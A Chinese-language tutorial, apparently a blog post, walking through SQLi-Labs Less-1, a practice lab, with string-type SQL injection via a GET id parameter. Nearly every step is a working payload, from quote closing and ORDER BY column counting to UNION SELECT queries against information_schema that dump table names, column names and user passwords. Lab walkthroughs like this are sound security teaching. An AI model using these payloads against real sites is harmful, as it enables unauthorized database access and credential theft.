文章详细介绍了如何利用错误的GET单引号字符型注入在SQLLabs的第一关中进行漏洞检测和利用。首先通过输入?id=1判断注入点和类型,然后通过联合查询和ORDERBY来确定字段数和回显位。接着查询数据库基本信息,如数据库名和版本,并使用GROUP_CONCAT函数爆表名和字段名,最后获取数据。
sqls-labs第一关(基于错误的GET单引号字符型注入)
目录
为了更直观的看到我们所输入的内容,可以修改一下第一个配置文件
打开sqli-labs存放的位置 Less-1/index.php,添加以下语句
echo $sql;
echo '<br/>';
echo '<br/>';
判断注入点
首先我们先输入?id=1判断页面是否正常显示
正常显示
判断注入类型
然后输入?id=1'判断是否存在注入
增加一个单引号 ’ ,判断语句的闭合符号,图中结果出现错误,由源码可以知道添加的单引号提前完成了闭合,多余的单引号引起了错误,我们可以将其注释掉。
输入?id=1' —+ 判断是数字型还是字符型
末尾添加–+,将之后的字段注释掉,显示恢复正常,可以判断出该处sql语句为字符型。
(如果是数字型,引号引起报错,将引号后语句注释掉也无法恢复,因为只有字符型格式需要添加符号进行闭合)
查询字段数
使用order by 查询字段数,可以从1开始查询
?id=1' order by 3 --+
?id=1' order by 4 --+
判断回显位
已知字段数,我们接下来需要判断一下哪个字段能在页面显示出来。
使用联合查询union
?id=-1' union select 1,2,3 --+
📌注:联合查询必须字段数一致。如果表存在 3 个字段联合查询的字段也必须是 3 个,否则报错。从而可以判断查询的字段数。
这里修改了 1 个重要参数,id=-1 这个值在数据库中是不存在的,原因是程序只返回一个结果,所以我们需要使 union 前面的语句出错才可以让我们后面查询的结果返回。
查询数据库基本信息
?id=-1'union select 1,database(),version()--+
爆表名
group_concat(table_name) 意思为将查询结果一起显示
information_scema 则为mysql自带的一个表,它包含了所有的数据库,拥有数据的访问权,
tables 是该库下的一个表,包含了所有表和表所属的数据库
table_chema 字段就是数据库名,表示该表所属数据库
table_name 表名
?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+
爆字段名
columns 表用于存储 MySQL 中的所有表的字段类型。
?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' --+
获取数据
?id=-1' union select 1,2,group_concat(username , password) from users--+
2026
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
